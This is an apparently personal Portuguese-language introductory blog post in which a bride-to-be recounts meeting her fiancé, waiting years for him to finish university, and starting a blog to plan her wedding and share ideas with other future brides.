E foi assim que aconteceu comigo. Anos de negação foram por água abaixo quando conheci meu noivo. Com 3 meses de namoro percebemos que não tínhamos outra opção senão ficarmos juntos para sempre.

Mas… Ele estava no começo da faculdade e teríamos 5 longos anos de espera. Mas tudo bem, 4 desses 5 anos se passaram e agora falta pouco… Muito pouco!
Nesses 5 anos fui pesquisando coisinhas de casamento, inspirações e aos poucos ele foi tomando forma. Agora é só viabilizar!

E por estar perdida entre tantas coisas a fazer, resolvi fazer esse blog. Para me ajudar a ver tudo num panorama geral e para ajudar as futuras noivinhas com ideias, dicas, etc…
Se você está para se casar, acompanhe essa aventura de dois malucos (porque vocês verão: é o que somos) planejando um casamento. Se você pensa em se casar um dia, espero que o blog te ajude a ao menos ir pensando no que gosta, no que não gosta. E se você não quer casar? Acompanhe também! Quem sabe a vontade de casar não surge?

%d blogueiros gostam disto: